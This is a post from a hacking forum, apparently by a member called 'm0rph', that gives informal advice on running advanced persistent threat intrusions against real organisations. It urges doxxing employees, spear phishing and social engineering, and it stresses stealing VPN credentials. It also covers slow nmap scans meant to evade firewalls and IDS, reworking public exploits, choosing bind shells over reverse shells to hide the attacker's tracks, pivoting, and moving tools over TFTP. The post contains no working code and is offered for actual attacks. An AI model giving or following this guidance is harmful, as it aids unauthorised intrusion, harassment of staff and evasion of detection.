iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
Advanced Persistent Threats
  • m0rph
    Posts: 332
    Hi everybody, welcome to another high quality paper by me!

    ..::Introductions::..

    So first, what are Advanced Persistent Threats? Without having to go Merriam-Webster on you, I suppose you could compare it to a professional Pentest, except for real. Any possible vector, any small amount of information, no matter how minuscule in retrospect to the grand scheme of things, can prove to have a snowball effect, and cause torrential downfall to whomever the target may be.

    I've seen a couple of APT attacks in the recent year. For example, Stuxnet, U.S. Government contractor Lockheed-Martin, RSA, Oak Ridge National Lab, to name a few. Many big name targets, all with major breaches of security (ok, maybe not Lockheed-Martin, but the others, oh yeah).

    So what kind of vectors would we normally look at for compromising internal networks? Errbody knows you can't just Kool-Aid man yourself through a NAT'ed network, right?

    ..::Common Attack Vectors::..

    Some things to consider attacking are:

    1) The users, of course
    [list]
    [*]DOX the fuck out of everyone important[/*:m]
    [*]E-mails/Spear Phishing/Malware[/*:m]
    [*]Targeted Corporate Phishing, not lame ass fake facebook logins[/*:m]
    [*]Social Engineering[/*:m][/list:u]

    2) Web servers likely to be internal AND external
    [list]
    [*]Some servers do have database access to other servers in the LAN via a web interface to the internet[/*:m]
    [*]Sharepoint services (These are mostly internal)[/*:m][/list:u]
    3) ***** VPN Credentials *****
    [list]
    [*]EXTREMELY VALUABLE[/*:m]
    [*]WAY TOO UNDER LOOKED AS FAR AS SECURITY IS CONCERNED[/*:m][/list:u]

    With Advanced Persistent Threats, there's really no set guide on how to do them. They are extremely information reliant, and situation specific. You really have to think outside of the box to be effective.

    ..::Thinking Outside The Box::..

    For extremely sophisticated and specific attacks, you will need extremely sophisticated and specific information, as well as tools.

    When the target has been chosen, the information gathering stage needs to be as micro-managed, and to the point as can be. Every single detail, about every single service, about every single employee likely to have admin rights of any kind (host or network), needs to be obtained and documented.

    1) NMap Scans
    [list]
    [*]Need to include service scans for TCP -AND- UDP ports[/*:m]
    [*]Need to be steathy...none of that -T5 shit. T1 may take longer, but it will also be less likely to trigger any perimeter devices like firewalls, and IDS/IPS.[/*:m]
    [*]NO VULNERABILITY SCANS. THAT IS WHAT SERVICE SCANS ARE FOR SO YOU CAN TAKE THE TIME TO RESEARCH FOR VULNERABILITIES ON YOUR OWN COMPUTER SAFELY.[/*:m][/list:u]

    2) Exploits
    [list]
    [*]Many openly available on the internet are rigged for either
    certain IP's or certain versions of OS's, or payloads that are useless (like calc.exe payloads). These need to be reworked to suit your needs. [/*:m]
    [*]Opcodes need to be changed to the specific operating system you are targeting.[/*:m]
    [*]NO REVERSE SHELLS ON EXTERNAL SERVERS. Bind shells may be trickier to pull off, and they may be difficult to clean up after yourself, but it is VERY hard to erase tracks from a reverse shell, and STUPID to deliberately bring a reverse connection back to your home IP. Unless of course, you break into someone's wifi, but be prepared to deal with suspicion, if your skills are known.[/*:m][/list:u]

    3) 0-days are your best friends
    [list]
    [*]Yes they are hard to get a hold of, and also hard to create on your own, but if you have even one 0-day, you can jump through so many hoops, very quickly with one.[/*:m][/list:u]
    4) Pivot!!
    [list]
    [*]If you don't know what pivoting is, I highly suggest you look into the Metasploit Unleashed class by Offensive Security.[/*:m]
    [*]Allows you to attack other computers from an already compromised computer.[/*:m]
    [*]If you're too 1337 for Metasploit, at least take the time to upload some attack tools to a machine (non interactive tools).[/*:m][/list:u]
    5) File Transfers
    [list]
    [*]All computers have the ability to transfer files from one computer to another. FTP is a TCP protocol, TFTP is UDP. FTP will most likely require an interactive command shell. Which is why TFTP is ba-ba-ba-ballin!!![/*:m]
    [*]Take the time to find non-interactive ftp/tftp clients[/*:m]
    [*]Compromise an FTP server, or even setup your own secret one within the target LAN (can be especially effective for moving tools between internal machines)[/*:m][/list:u]
    ..::Be a Ninja::..

    As is the common theme of professional hackers, emulate it! Limit the amount of traffic you're putting out, AND RECEIVING. Stuxnet took a long time to reach its target, but when it did it completely fucked shit up! Limit your ping packets to the lowest packet size possible. Hence why we use the T1 option for NMap...cuz it's slow...and doesn't put out a lot of traffic all at one time.

    Be patient. Advanced Persistent Threats are exactly that...Persistent. With that said, I believe I've covered a good amount here. There will be a video coming in the near future from me on a possible attack scenario you might see in an Advanced Persistent Threat. Expect some awesome stuff! Peace Out!

    m0rph
    while( !(succeed = try() ) );
Add a Comment